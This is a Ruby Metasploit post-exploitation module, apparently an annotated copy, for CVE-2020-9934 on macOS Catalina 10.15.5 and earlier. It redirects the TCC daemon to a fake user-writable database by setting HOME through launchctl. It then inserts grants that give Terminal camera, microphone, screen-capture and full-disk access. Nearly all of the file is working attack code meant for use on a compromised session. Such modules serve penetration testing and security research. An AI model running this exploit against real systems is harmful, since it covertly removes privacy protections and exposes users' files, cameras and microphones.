Path: blob/master/modules/post/osx/escalate/tccbypass.rb
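##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation module for CVE-2020-9934: on macOS Catalina <= 10.15.5 the
# TCC daemon resolves its database relative to $HOME, so pointing HOME (in the
# launchd environment) at an attacker-controlled directory and restarting tccd
# yields a fresh, user-writable TCC.db into which arbitrary grants can be
# inserted. Requires an existing shell/meterpreter session; no root needed.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System

  # Service identifiers that get granted to BUNDLE in the fake database.
  # Kept exactly as shipped in the original module. NOTE(review): the bare
  # 'kTCCService' entry is not a recognised service name and is presumably
  # inert; confirm before relying on it.
  TCC_SERVICES = [
    'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', 'kTCCServiceSystemPolicyDocumentsFolder', 'kTCCService',
    'kTCCServiceSystemPolicyDeveloperFiles', 'kTCCServiceSystemPolicyDesktopFolder', 'kTCCServiceSystemPolicyAllFiles', 'kTCCServiceSystemPolicyNetworkVolumes',
    'kTCCServiceSystemPolicySysAdminFiles', 'kTCCServiceSystemPolicyDownloadsFolder'
  ].freeze

  # Bundle the grants are issued to, and the matching code-signing
  # requirement blob (hex) stored in the csreq column.
  BUNDLE = 'com.apple.Terminal'
  CSREQ = 'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bypass the macOS TCC Framework',
        'Description' => %q{
          This module exploits a vulnerability in the TCC daemon on macOS Catalina
          (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
          manipulated (by setting the HOME environment variable) to use a new user
          controlled location as the TCC database. We can then grant ourselves
          entitlements by inserting them into this new database.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mattshockl', # discovery
          'timwr', # metasploit module
        ],
        'References' => [
          ['CVE', '2020-9934'],
          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
          'Reliability' => []
        },
        'Platform' => [ 'osx' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ]
      )
    )
    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  # Version gate only: the HOME override was closed in 10.15.6, and the
  # technique is untested below Catalina, so those report Safe / Unknown
  # respectively. Anything in 10.15.0..10.15.5 is reported as Appears.
  #
  # @return [Exploit::CheckCode]
  def check
    system_version = get_system_version
    return Exploit::CheckCode::Unknown unless system_version

    version = Rex::Version.new(system_version)
    if version >= Rex::Version.new('10.15.6')
      Exploit::CheckCode::Safe
    elsif version < Rex::Version.new('10.15.0')
      Exploit::CheckCode::Unknown
    else
      Exploit::CheckCode::Appears
    end
  end

  # Redirects tccd at a fresh database under WritableDir and inserts grants
  # for every entry of TCC_SERVICES. The HOME override and the fake database
  # are intentionally left in place: reverting them (see the printed cleanup
  # command) is exactly what revokes the granted entitlements.
  def run
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == Exploit::CheckCode::Appears

    writable_dir = datastore['WritableDir']
    fail_with(Failure::BadConfig, "#{writable_dir} is not writable") unless writable?(writable_dir)
    # Every path derived from WritableDir is interpolated into a single-quoted
    # shell argument below; a quote in it would break out of that quoting and
    # leave the target in a half-configured state, so reject it up front.
    fail_with(Failure::BadConfig, 'WritableDir must not contain a single quote') if writable_dir.include?("'")

    tmpdir = "#{writable_dir}/.#{Rex::Text.rand_text_alpha(8)}"
    tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"
    tccdb = "#{tccdir}/TCC.db"

    print_status("Creating TCC directory #{tccdir}")
    cmd_exec("mkdir -p '#{tccdir}'")
    # HOME is set in the launchd (per-user) environment, which is what tccd
    # inherits when launchd restarts it; the daemon then creates TCC.db
    # under tccdir, owned and writable by the current user.
    cmd_exec("launchctl setenv HOME '#{tmpdir}'")
    cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')

    # The database is created by the restarted daemon, not by the launchctl
    # call itself, so allow it a moment to appear instead of failing on a
    # single immediate check.
    unless wait_for_file(tccdb)
      print_error("No fake TCC DB found: #{tccdb}")
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end
    print_good("fake TCC DB found: #{tccdb}")

    failures = grant_entitlements(tccdb)
    if failures.zero?
      print_good('TCC.db was successfully updated!')
    else
      print_warning("TCC.db updated, but #{failures} insert(s) failed; some entitlements may be missing")
    end

    cleanup_command = "launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd\nrm -rf '#{tmpdir}'"
    print_status("To cleanup, run:\n#{cleanup_command}\n")
  end

  private

  # Polls for +path+ on the target, one second apart, up to +attempts+ times.
  #
  # @param path [String] remote path to wait for
  # @param attempts [Integer] maximum number of existence checks
  # @return [Boolean] true once the file exists, false if it never appears
  def wait_for_file(path, attempts: 5)
    attempts.times do
      return true if file_exist?(path)

      Rex.sleep(1)
    end
    false
  end

  # Inserts one allow-row per TCC service into the fake database via the
  # target's sqlite3 binary. All interpolated values are module constants or
  # the module-generated path, so no untrusted data reaches the SQL or shell.
  #
  # @param tccdb [String] path to the attacker-controlled TCC.db
  # @return [Integer] number of inserts for which sqlite3 produced output
  #   (sqlite3 is silent on success, so any output is treated as an error)
  def grant_entitlements(tccdb)
    isfile = '0'
    # Grants are time-limited by the last column; one year out is ample.
    timestamp = 1.year.from_now.to_i.to_s
    failures = 0
    TCC_SERVICES.each do |service|
      sql_insert = "INSERT INTO access VALUES('#{service}', '#{BUNDLE}', #{isfile}, 1, 1, X'#{CSREQ}', NULL, NULL, 'UNUSED', NULL, NULL, #{timestamp});"
      sqloutput = cmd_exec("sqlite3 '#{tccdb}' \"#{sql_insert}\"").to_s.strip
      next if sqloutput.empty?

      # Surface the actual sqlite3 message (e.g. a constraint or schema
      # error) rather than just the fact that something was printed.
      failures += 1
      print_error("sqlite3 failed for #{service}: #{sqloutput}")
    end
    failures
  end
end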